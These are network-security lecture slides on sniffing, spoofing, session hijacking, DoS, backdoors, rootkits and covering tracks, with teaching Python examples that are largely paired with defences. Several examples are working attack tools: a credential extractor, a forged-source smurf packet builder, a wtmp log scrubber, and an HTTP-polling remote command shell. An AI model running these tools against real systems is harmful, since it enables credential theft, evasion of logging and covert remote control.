KULIAH III (LECTURE III): THREAT AND ATTACK (2)

Aswin Suharsono

KOM 15008

Keamanan Jaringan (Network Security)

2012/2013


Overview

  • Phase 3: Gaining Access Using Network Attacks

    • Sniffing

    • IP Address Spoofing

    • Session Hijacking

    • Netcat

    • DoS (Denial of Service)

  • Phase 4: Maintain Access

    • Trojan

    • Backdoors

  • Phase 5: Covering Tracks and Hiding


Sniffer

  • Allows an attacker to see everything sent across the network, including user IDs and passwords of any protocol that carries them in cleartext

  • NIC placed in promiscuous mode

  • Tcpdump http://www.tcpdump.org

  • Windump http://netgroup-serv.polito.it/windump

  • Snort http://www.snort.org

  • Ethereal (renamed Wireshark in 2006) http://www.ethereal.com

  • Sniffit http://reptile.rug.ac.be/~coder/sniffit/sniffit.html

  • Dsniff http://www.monkey.org/~dugsong/dsniff


Passive Sniffers

  • Sniffers that passively wait for traffic to reach their interface; they inject nothing, so the network carries no trace of them

  • Well suited for a hub environment, where the shared medium delivers every frame to every port

  • Snort

  • Sniffit



Bad guys can sniff packets

packet "sniffing":

  • broadcast media (shared Ethernet, wireless)

  • promiscuous network interface reads/records all packets (e.g., including passwords!) passing by

[Figure: hosts A, B and C on a shared medium; B sends "src:B dest:A payload" to A, and C's promiscuous interface reads it as well]

  • Wireshark software used for end-of-chapter labs is a (free) packet-sniffer
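The sniffer slides above say that a promiscuous interface lets the attacker read passwords off the wire. The following added example (not part of the original lecture) shows the part of that work that happens after capture: decoding Ethernet/IPv4/TCP headers and pulling credentials out of cleartext FTP, POP3 and HTTP traffic, the way dsniff does. It goes slightly beyond the slides by handling three protocols rather than one. The frames are constructed in memory for illustration (nothing is captured or sent); the addresses, user names and passwords are made up.

```python
"""Passive sniffer logic: parse Ethernet II / IPv4 / TCP frames and extract
cleartext credentials from FTP, POP3 and HTTP Basic authentication.

Added example, not the lecture's own code. A real sniffer would obtain the
frames from a promiscuous-mode interface (tcpdump, Wireshark, a raw socket);
here they are constructed inline."""
import base64
import socket
import struct

ETH_P_IP = 0x0800
IPPROTO_TCP = 6


def build_frame(src_ip, dst_ip, sport, dport, payload):
    """Construct a sample frame. Checksums are left at zero: a passive sniffer
    never validates them, so they do not matter for the demonstration."""
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + struct.pack("!H", ETH_P_IP)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, IPPROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp + payload


def parse_frame(frame):
    """Decode headers. Returns (src, dst, sport, dport, payload), or None if the
    frame is not IPv4 over Ethernet carrying TCP."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETH_P_IP:
        return None
    ip = frame[14:]
    if ip[0] >> 4 != 4 or ip[9] != IPPROTO_TCP:
        return None
    ihl = (ip[0] & 0x0F) * 4                       # header length in bytes
    src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_offset = (tcp[12] >> 4) * 4               # TCP header length in bytes
    return src, dst, sport, dport, tcp[data_offset:]


def extract_credentials(frames):
    """Scan application payloads for credentials sent in the clear."""
    found = []
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src, dst, _sport, dport, payload = parsed
        text = payload.decode("latin-1")
        if dport in (21, 110):                     # FTP and POP3: "USER x" / "PASS y"
            for line in text.splitlines():
                if line.upper().startswith(("USER ", "PASS ")):
                    found.append((src, dst, dport, line.strip()))
        elif dport == 80:                          # HTTP Basic: base64(user:password)
            for line in text.split("\r\n"):
                if line.lower().startswith("authorization: basic "):
                    creds = base64.b64decode(line.split()[2]).decode()
                    found.append((src, dst, dport, "Basic " + creds))
    return found


# Constructed sample traffic (not a real capture).
SAMPLE_FRAMES = [
    build_frame("10.0.0.5", "10.0.0.1", 40001, 21, b"USER alice\r\n"),
    build_frame("10.0.0.5", "10.0.0.1", 40001, 21, b"PASS hunter2\r\n"),
    build_frame("10.0.0.5", "10.0.0.2", 40002, 80,
                b"GET / HTTP/1.1\r\nHost: intranet\r\n"
                b"Authorization: Basic Ym9iOnMzY3IzdA==\r\n\r\n"),
    build_frame("10.0.0.5", "10.0.0.3", 40003, 443, b"\x16\x03\x01\x00\x10"),  # TLS: opaque
]

if __name__ == "__main__":
    for src, dst, port, cred in extract_credentials(SAMPLE_FRAMES):
        print("%s -> %s:%d  %s" % (src, dst, port, cred))
```

The TLS frame yields nothing, which is the point of the countermeasure the course implies: a sniffer only helps the attacker where the application protocol itself is cleartext.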


Bad guys can use fake addresses

IP spoofing: send a packet with a false source address

[Figure: host C sends a packet labelled "src:B dest:A payload" to A, claiming to be B]

… lots more on security (throughout, Chapter 8)




IP Address Spoofing

  • Changing or disguising the source IP address

  • Used by Nmap in decoy mode, where the real probes are mixed with probes carrying decoy source addresses so the target cannot tell which host is scanning

  • Used by Dsniff in dnsspoof attack

    • DNS response sent by Dsniff contains source address of the DNS server

  • Used in denial-of-service attacks

  • Used in undermining Unix r-commands (rlogin, rsh), which grant access on the basis of the client's address

  • Used with source routing attacks


Simple IP Address Spoofing

  • Pros

    • Works well in hiding source of a packet flood or other denial-of-service attack

  • Cons

    • Difficult for the attacker to monitor response packets

    • Any response packet is sent to the spoofed IP address, not to the attacker

    • Difficult to spoof against any TCP-based service: the attacker never sees the server's SYN-ACK, so cannot learn the sequence number needed to complete the handshake, unless the machines are on the same LAN and ARP spoofing is used to redirect the responses





Session Hijacking

  • Session hijacking: a combination of sniffing and spoofing

  • What a session is

  • Sniff for the session

  • Record it

  • Use it to get in

  • By stealing someone else's session, the attacker can get in without needing to log in
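The slide describes the attack in three steps: sniff the session, record it, use it to get in. The following added example (not part of the original lecture) models that at the HTTP layer against an in-memory web application: the victim's cleartext request carries a session cookie, the attacker's sniffer lifts it out and replays it from another address, and the server, which authorizes by cookie alone, lets the attacker in with no login. A `bind_to_client` option shows the partial check of tying the session to the client address; the user name, password, addresses and host name are illustrative.

```python
"""HTTP session hijacking: replaying a sniffed session id.

Added example, not the lecture's own code. SessionServer is a minimal model
of a web application's session handling; the "captured" request is a
constructed string, not a real packet capture."""
import secrets
import time


def _cookie_value(raw_request, name):
    """Return the value of cookie `name` from a raw HTTP request, or None."""
    for line in raw_request.split("\r\n"):
        if line.lower().startswith("cookie:"):
            for part in line.split(":", 1)[1].split(";"):
                key, _, value = part.strip().partition("=")
                if key == name:
                    return value
    return None


class SessionServer:
    def __init__(self, bind_to_client=False, idle_timeout=900):
        self.users = {"alice": "correct horse battery staple"}   # constructed account
        self.sessions = {}                 # sid -> {"user", "ip", "last_seen"}
        self.bind_to_client = bind_to_client
        self.idle_timeout = idle_timeout

    def login(self, user, password, client_ip):
        """Return a Set-Cookie value on success, None on failure."""
        if self.users.get(user) != password:
            return None
        sid = secrets.token_urlsafe(24)    # unguessable: the attack steals it, not guesses it
        self.sessions[sid] = {"user": user, "ip": client_ip, "last_seen": time.time()}
        return "SESSIONID=%s; HttpOnly" % sid

    def handle(self, raw_request, client_ip, now=None):
        """Authorize a request by the session cookie it carries."""
        now = time.time() if now is None else now
        sess = self.sessions.get(_cookie_value(raw_request, "SESSIONID"))
        if sess is None:
            return 401, "login required"
        if now - sess["last_seen"] > self.idle_timeout:
            return 401, "session expired"
        if self.bind_to_client and sess["ip"] != client_ip:
            return 403, "session not valid from this address"
        sess["last_seen"] = now
        return 200, "hello %s, here is your account page" % sess["user"]


def build_request(sid):
    return ("GET /account HTTP/1.1\r\nHost: bank.example\r\n"
            "Cookie: SESSIONID=%s\r\n\r\n" % sid)


def steal_session_id(sniffed_request):
    """Step 1 and 2 of the slide: sniff the session and record it."""
    return _cookie_value(sniffed_request, "SESSIONID")


def hijack_demo(bind_to_client=False):
    """Victim logs in from 10.0.0.5; attacker at 10.0.0.66 replays the cookie.
    Returns (victim_status, attacker_status)."""
    server = SessionServer(bind_to_client=bind_to_client)
    cookie = server.login("alice", "correct horse battery staple", "10.0.0.5")
    sid = cookie.split(";")[0].split("=", 1)[1]
    victim_request = build_request(sid)            # crosses the shared segment in cleartext
    victim_status, _ = server.handle(victim_request, "10.0.0.5")
    stolen = steal_session_id(victim_request)      # read by the attacker's sniffer
    attacker_status, _ = server.handle(build_request(stolen), "10.0.0.66")  # step 3: use it
    return victim_status, attacker_status


if __name__ == "__main__":
    print("no binding:", hijack_demo())        # (200, 200): attacker is in, no login needed
    print("ip binding:", hijack_demo(True))    # (200, 403): replay from another address refused
```

Binding the session to the client address is only a partial check: the slide itself defines hijacking as sniffing plus spoofing, and an attacker on the same LAN who can also take over the victim's address (ARP spoofing) passes it, while legitimate users behind NAT or on mobile networks may fail it. The check that actually removes the attack is never sending the session id in cleartext (TLS with the cookie marked Secure), with a short idle timeout as defence in depth.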


Denial of Service (DoS)

Denial of Service (DoS): attackers make resources (server, bandwidth) unavailable to legitimate traffic by overwhelming the resource with bogus traffic

[Figure: many compromised hosts sending traffic to a single target]

Bad guys: attack server, network infrastructure

1. select target

2. break into hosts around the network (see botnet)

3. send packets to target from compromised hosts


SYN Flood

  • Attacker sends a continuous stream of SYN packets to the target, usually with spoofed source addresses that will never answer

  • Target allocates an entry in its connection queue (the listen backlog) to keep track of each half-open connection

  • Attacker never completes the 3-way handshake, so the entries stay until they time out, filling up all slots in the connection queue of the target machine; new legitimate SYNs are then dropped

  • Even if the target machine has a very large connection queue, the attacker can instead send enough SYN packets to consume the target machine's entire network bandwidth
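The slide explains the resource being exhausted (the half-open connection queue) but not how little traffic that takes. The following added example (not from the original lecture) is a small event simulation of a listen queue: attack SYNs carry unanswerable spoofed sources and hold a slot until the SYN-RECV timer expires, legitimate SYNs complete at once, and the function returns the fraction of legitimate clients that still got in. The parameters (backlog 128, 63 s half-open lifetime, arrival rates) are assumptions chosen to resemble common defaults, not values from the lecture; no packets are sent.

```python
"""Listen-queue model under a SYN flood. Added example, not the lecture's own
code; the defaults are illustrative assumptions."""
import random


def simulate(backlog=128, synrecv_timeout=63.0, attack_rate=20.0,
             legit_rate=5.0, duration=60.0, seed=1):
    """Fraction of legitimate SYNs that found a free queue slot.

    attack_rate / legit_rate are SYNs per second (Poisson arrivals);
    synrecv_timeout is how long a never-completed entry occupies a slot."""
    rng = random.Random(seed)
    arrivals = []
    for rate, kind in ((attack_rate, "attack"), (legit_rate, "legit")):
        t = 0.0
        while rate > 0:
            t += rng.expovariate(rate)
            if t > duration:
                break
            arrivals.append((t, kind))
    arrivals.sort()

    half_open = []                       # expiry time of each attacker-held slot
    accepted = rejected = 0
    for t, kind in arrivals:
        half_open = [exp for exp in half_open if exp > t]   # reap timed-out entries
        if len(half_open) >= backlog:    # queue full: the SYN is silently dropped
            if kind == "legit":
                rejected += 1
            continue
        if kind == "attack":
            half_open.append(t + synrecv_timeout)           # held until the timer fires
        else:
            accepted += 1                # handshake completes; slot is freed immediately
    seen = accepted + rejected
    return accepted / seen if seen else 1.0


def minimum_flood_rate(backlog, synrecv_timeout):
    """SYNs per second needed to keep the queue permanently full: N slots,
    each held for T seconds, are refilled by N/T arrivals per second."""
    return backlog / synrecv_timeout


def bandwidth_flood_rate(link_bps, syn_frame_bytes=64):
    """SYNs per second needed for the slide's alternative, saturating the link
    itself (minimum-size Ethernet frames), for comparison."""
    return link_bps / (syn_frame_bytes * 8)


if __name__ == "__main__":
    print("legit clients served, 1 SYN/s attack : %.2f" % simulate(attack_rate=1.0))
    print("legit clients served, 20 SYN/s attack: %.2f" % simulate(attack_rate=20.0))
    print("rate to keep a 128-slot queue full   : %.1f SYN/s" % minimum_flood_rate(128, 63.0))
    print("rate to saturate 100 Mbit/s          : %.0f SYN/s" % bandwidth_flood_rate(100e6))
```

The contrast between the last two lines is the practical lesson: about two SYNs per second defeat a 128-slot queue with the assumed 63 s timeout, while saturating a 100 Mbit/s link takes roughly two hundred thousand per second. Shortening the half-open timeout, enlarging the backlog, or dropping state entirely (SYN cookies) all attack the N/T term directly.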


Smurf Attacks

  • Aka directed broadcast attacks

  • Smurf attacks rely on ICMP echo requests sent to a directed broadcast address to create a flood of echo replies at the victim

  • Attacker uses the victim's address as the spoofed source address, so every host on the broadcast network sends its reply to the victim

  • Smurf attack is a DoS that consumes the network bandwidth of the victim; the attacker's traffic is multiplied by the number of responding hosts

  • A smurf amplifier is a network whose router forwards directed broadcasts and whose hosts respond to them
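The IP spoofing slides say the source address is simply "changed or disguised", and the smurf slides say the disguised source is the victim. The following added example (not from the original lecture) makes both concrete by building the actual bytes of a smurf packet: an IPv4 header with a forged source, an ICMP echo request, and correct checksums for both. It then shows the two checks a border router applies to stop its network being used this way: refusing inbound directed broadcasts and filtering packets whose source address does not belong where the packet came from. The addresses are documentation ranges; nothing is sent, since that would require a raw socket and root.

```python
"""Forged-source IPv4/ICMP packet construction (the smurf packet) and the
router-side filters that defeat it. Added example, not the lecture's code."""
import ipaddress
import socket
import struct


def checksum(data):
    """Internet checksum (RFC 1071): one's-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src, dst, proto, payload_len, ttl=64):
    """20-byte IPv4 header. `src` is whatever the sender writes: nothing on the
    path verifies it, which is all IP spoofing amounts to."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0x1234, 0, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def icmp_echo_request(ident, seq, payload=b""):
    """ICMP type 8 (echo request) with its checksum filled in."""
    hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    return struct.pack("!BBHHH", 8, 0, checksum(hdr + payload), ident, seq) + payload


def smurf_packet(victim, broadcast, payload=b"\x00" * 56):
    """Source = victim (spoofed), destination = directed broadcast of the amplifier."""
    icmp = icmp_echo_request(ident=1, seq=1, payload=payload)
    return ipv4_header(victim, broadcast, socket.IPPROTO_ICMP, len(icmp)) + icmp


def describe(packet):
    """Decode the fields a router or IDS would look at."""
    return {"src": socket.inet_ntoa(packet[12:16]),
            "dst": socket.inet_ntoa(packet[16:20]),
            "proto": packet[9],
            "icmp_type": packet[20],
            "checksums_valid": checksum(packet[:20]) == 0 and checksum(packet[20:]) == 0,
            "len": len(packet)}


def router_filter(packet, local_nets, inbound):
    """Return a drop reason, or None if the packet passes. local_nets are the
    IPv4Network objects behind the router; inbound means arriving from outside."""
    src = ipaddress.ip_address(socket.inet_ntoa(packet[12:16]))
    dst = ipaddress.ip_address(socket.inet_ntoa(packet[16:20]))
    src_local = any(src in net for net in local_nets)
    if inbound:
        for net in local_nets:
            if dst == net.broadcast_address:      # "no ip directed-broadcast": not an amplifier
                return "drop: directed broadcast to %s" % net
        if src_local:                              # a local source cannot arrive from outside
            return "drop: inbound packet with spoofed local source %s" % src
    elif not src_local:                            # egress filtering: only our own addresses leave
        return "drop: outbound packet with non-local source %s" % src
    return None


if __name__ == "__main__":
    pkt = smurf_packet(victim="192.0.2.10", broadcast="198.51.100.255")
    print(describe(pkt))
    nets = [ipaddress.ip_network("198.51.100.0/24")]
    print("arriving at amplifier's router:", router_filter(pkt, nets, inbound=True))
    print("leaving the attacker's network:", router_filter(pkt, nets, inbound=False))
```

Both filters matter: the first stops a network from being an amplifier, the second stops it from being the origin of spoofed traffic, which also removes the cover that simple spoofing gives a packet flood.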


4. Maintaining Access


Trojan Horses

  • A software program containing a concealed malicious capability while appearing benign, useful, or attractive to users


Backdoor

  • Software that allows an attacker to access a machine through an alternative entry method

  • Installed by attackers after a machine has been compromised

  • May permit the attacker to access a computer without needing to provide account names and passwords

  • Featured in the movie "WarGames"

  • Can be an sshd listening on a port other than 22

  • Can be set up using Netcat


Netcat as a Backdoor

  • A popular backdoor tool

  • Netcat must be compiled with the "GAPING_SECURITY_HOLE" option for the -e flag to be available

  • On the victim machine, run Netcat in listener mode with the -e flag to execute a specific program, such as a command shell, for whoever connects

  • On the attacker's machine, run Netcat in client mode to connect to the backdoor on the victim; whatever is typed goes to the shell and its output comes back over the same connection


Traditional RootKits

  • A suite of tools that allows an attacker to maintain root-level access via a backdoor while hiding evidence of the system compromise

  • More powerful than application-level Trojan horse backdoors (e.g. BO2K, Netcat), since those run as separate programs that are easily detected

  • A more insidious form of Trojan horse backdoor than its application-level counterparts, since existing critical system components (such as ls and ps) are replaced with versions that give the attacker backdoor access and hide the attacker's presence
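Because a traditional rootkit replaces system binaries on disk, the check that catches it is a file-integrity baseline of the kind Tripwire keeps: hash the critical files while the system is known-good, store the result off the machine, and compare later. The following added example (not the lecture's or Tripwire's code) builds such a baseline over constructed stand-ins for /bin/ls, /bin/ps and /bin/netstat in a temporary directory, then "installs" a trojaned ps that also restores the original modification time, and shows that the hash still gives it away.

```python
"""File-integrity baseline in the manner of Tripwire, run against constructed
files in a temporary directory. Added example, not the lecture's own code."""
import hashlib
import os
import stat
import tempfile


def file_fingerprint(path):
    """Attributes worth baselining. The hash is the one that matters: mtime and
    size can be restored or padded by an attacker, a SHA-256 cannot be."""
    st = os.lstat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "size": st.st_size,
            "mode": stat.S_IMODE(st.st_mode), "mtime": int(st.st_mtime)}


def build_baseline(paths):
    return {p: file_fingerprint(p) for p in paths}


def compare(baseline):
    """Return {path: [changed attributes]}; 'missing' if the file is gone."""
    changes = {}
    for path, old in baseline.items():
        if not os.path.exists(path):
            changes[path] = ["missing"]
            continue
        now = file_fingerprint(path)
        diff = [k for k in old if old[k] != now[k]]
        if diff:
            changes[path] = diff
    return changes


def demo():
    """Constructed scenario: a fake /bin; the attacker replaces ps with a
    version that hides the backdoor, and resets the timestamp with utime."""
    root = tempfile.mkdtemp()
    binaries = {}
    for name in ("ls", "ps", "netstat"):
        path = os.path.join(root, name)
        with open(path, "wb") as f:
            f.write(b"#!/bin/sh\necho real " + name.encode() + b"\n")   # stand-in binary
        os.chmod(path, 0o755)
        binaries[name] = path
    baseline = build_baseline(binaries.values())

    ps = binaries["ps"]
    original = os.stat(ps)
    with open(ps, "wb") as f:
        f.write(b"#!/bin/sh\n/usr/lib/.h/ps.orig \"$@\" | grep -v -e backdoor -e nc\n")
    os.utime(ps, (original.st_atime, original.st_mtime))   # "touch -r": hide the mtime change

    return {os.path.basename(k): v for k, v in compare(baseline).items()}


if __name__ == "__main__":
    print(demo())   # {'ps': ['sha256', 'size']}: mtime was restored, hash and size were not
```

Two caveats a practitioner would add. The baseline and the checker must live where the attacker cannot rewrite them (read-only media or another host), otherwise root simply re-baselines after the change. And, as the next slide explains, this check is blind to a kernel-level rootkit: the files on disk really are unmodified, and a trojaned kernel can in any case lie to the checker about what it reads.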


Kernel-Level RootKits

  • More sinister, devious, and nasty than traditional RootKits

  • The operating system kernel is replaced by a Trojan horse kernel that appears to be well-behaved but is in fact rotten to the core

  • Critical system files such as ls, ps, du and ifconfig are left unmodified

  • The Trojanized kernel can intercept system calls and run another application chosen by the attacker

    • An execution request for /bin/login is mapped to /bin/backdoorlogin

    • Tripwire checks the system files on disk, which are unaltered, so it reports nothing

  • If the kernel cannot be trusted, nothing on the system can be trusted


5. Covering Tracks


Hiding Evidence by Altering Event Logs

  • Attackers like to remove the log evidence associated with gaining access, elevating privileges, and installing RootKits and backdoors

    • Login records (utmp, wtmp and lastlog on Unix)

    • Stopped and restarted services

    • File access/update times
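Login records are the first thing removed because `last` and `who` read them directly. The following added example (not from the original lecture) shows both sides on constructed data: a scrubber that drops every wtmp record naming the attacker's host, which is what log-cleaning tools do, and the cross-check that catches it, comparing the surviving records against the sshd "Accepted" lines in syslog. It assumes the 384-byte glibc `struct utmp` layout of x86 Linux (little-endian) for the records; everything is built in memory, and the user names, hosts, PIDs and timestamps are made up.

```python
"""Scrubbing wtmp login records, and detecting the scrub by cross-checking
against sshd syslog lines. Added example, not the lecture's own code."""
import re
import struct

# glibc struct utmp on x86 Linux: 384 bytes, little-endian (assumption for the demo).
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)          # 384
USER_PROCESS, DEAD_PROCESS = 7, 8


def pack_entry(ut_type, pid, line, user, host, ts):
    """Build one wtmp record (constructed data)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, ts, 0, 0, 0, 0, 0)


def parse_wtmp(data):
    entries = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack(UTMP_FMT, data[off:off + UTMP_SIZE])
        entries.append({"type": f[0], "pid": f[1],
                        "line": f[2].rstrip(b"\x00").decode(),
                        "user": f[4].rstrip(b"\x00").decode(),
                        "host": f[5].rstrip(b"\x00").decode(),
                        "time": f[9]})
    return entries


def scrub(data, host):
    """What a log cleaner does: drop every record mentioning the attacker's
    host and write the rest back, so `last` no longer shows the session."""
    records = [data[off:off + UTMP_SIZE] for off in range(0, len(data), UTMP_SIZE)]
    return b"".join(r for r in records if parse_wtmp(r)[0]["host"] != host)


ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+) port")


def logins_missing_from_wtmp(entries, syslog_lines):
    """Every sshd 'Accepted' line should have a USER_PROCESS record for the same
    user and host; scrubbing one source but not the other leaves a gap."""
    in_wtmp = {(e["user"], e["host"]) for e in entries if e["type"] == USER_PROCESS}
    accepted = set()
    for line in syslog_lines:
        m = ACCEPTED.search(line)
        if m:
            accepted.add((m.group(1), m.group(2)))
    return accepted - in_wtmp


# Constructed sample data: a legitimate session and the attacker's session.
SAMPLE_WTMP = b"".join([
    pack_entry(USER_PROCESS, 1201, "pts/0", "alice", "10.0.0.5", 1_700_000_000),
    pack_entry(USER_PROCESS, 1340, "pts/1", "root", "203.0.113.9", 1_700_000_600),
    pack_entry(DEAD_PROCESS, 1340, "pts/1", "", "203.0.113.9", 1_700_001_200),
    pack_entry(DEAD_PROCESS, 1201, "pts/0", "", "10.0.0.5", 1_700_003_000),
])
SAMPLE_SYSLOG = [
    "Nov 14 22:13:20 host sshd[1201]: Accepted publickey for alice from 10.0.0.5 port 50122 ssh2",
    "Nov 14 22:23:20 host sshd[1340]: Accepted password for root from 203.0.113.9 port 41000 ssh2",
]

if __name__ == "__main__":
    cleaned = scrub(SAMPLE_WTMP, "203.0.113.9")
    print("records before/after scrub:", len(parse_wtmp(SAMPLE_WTMP)), len(parse_wtmp(cleaned)))
    print("logins in syslog with no wtmp record:",
          logins_missing_from_wtmp(parse_wtmp(cleaned), SAMPLE_SYSLOG))
```

The cross-check only works if the attacker cannot edit both sources, which with root on the box they can. The check a practitioner relies on is therefore the same comparison against logs that were shipped off the host as they were written (remote syslog), so that the local scrub leaves the remote copy intact.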


Covert Channels

  • Communication channels that disguise data as it moves across the network, to avoid detection

  • Require a client and server

  • Can be used to remotely control a machine and to secretly transfer files or applications


Figure 11.5 A covert channel between a client and a server


Tunneling

  • Carrying one protocol inside another protocol

    • E.g. tunneling AppleTalk traffic over IP

  • Any communications protocol can be used to transmit another protocol

    • The SSH protocol used to carry telnet, FTP, or X Window sessions

  • Used by covert channels

    • Loki (commands and data carried in the payload of ICMP echo packets)

    • Reverse WWW Shell (the compromised host polls the attacker with outbound HTTP requests; commands come back in the responses)
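The Reverse WWW Shell pattern is the one most likely to pass a firewall, because the compromised host initiates ordinary outbound HTTP and the attacker only ever answers. The following added example (not the original Reverse WWW Shell tool and not part of the lecture) runs both ends in one process on 127.0.0.1: the attacker's "web server" hands out the next command as the page body, and the victim's agent reports command output in the query string of its next request. Encoding is plain base64 with no further disguise; the port is chosen by the OS.

```python
"""Reverse WWW Shell pattern: command and control tunneled inside outbound
HTTP polling. Added example, not the lecture's own code."""
import base64
import http.server
import subprocess
import threading
import urllib.parse
import urllib.request


class Master(http.server.BaseHTTPRequestHandler):
    """Attacker side: to a proxy or firewall it is just a web server."""
    commands = []          # queued by run_session()
    results = []           # output reported back by the agent

    def do_GET(self):
        query = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query,
                                      keep_blank_values=True)
        if "d" in query:                              # output of the previous command
            Master.results.append(base64.urlsafe_b64decode(query["d"][0]).decode())
        nxt = Master.commands.pop(0) if Master.commands else "exit"
        body = base64.b64encode(nxt.encode())          # "page content" is the next command
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):                     # keep the demo quiet
        pass


def agent(master_url, max_polls=50):
    """Victim side: poll like a browser, run what comes back, report the output."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore proxy env
    output = None                                      # nothing to report on the first poll
    for _ in range(max_polls):
        url = master_url + "/index.html"
        if output is not None:
            url += "?d=" + base64.urlsafe_b64encode(output.encode()).decode()
        with opener.open(url, timeout=5) as resp:
            cmd = base64.b64decode(resp.read()).decode()
        if cmd == "exit":
            return
        output = subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_session(commands):
    """Run master and agent together; return the outputs the master collected."""
    Master.commands, Master.results = list(commands), []
    srv = http.server.HTTPServer(("127.0.0.1", 0), Master)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        agent("http://127.0.0.1:%d" % srv.server_address[1])
    finally:
        srv.shutdown()
        srv.server_close()
    return Master.results


if __name__ == "__main__":
    print(run_session(["echo covert", "id"]))
```

What gives this away on the wire is exactly what the tunneling slide calls carrying one protocol inside another: GET requests to the same host at regular intervals, query strings and bodies that are base64 rather than HTML, and a destination with no business reason to be visited. Those are the features a detection rule for beaconing looks for, and they hold even when the payload encoding is changed.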


Terima Kasih (Thank You)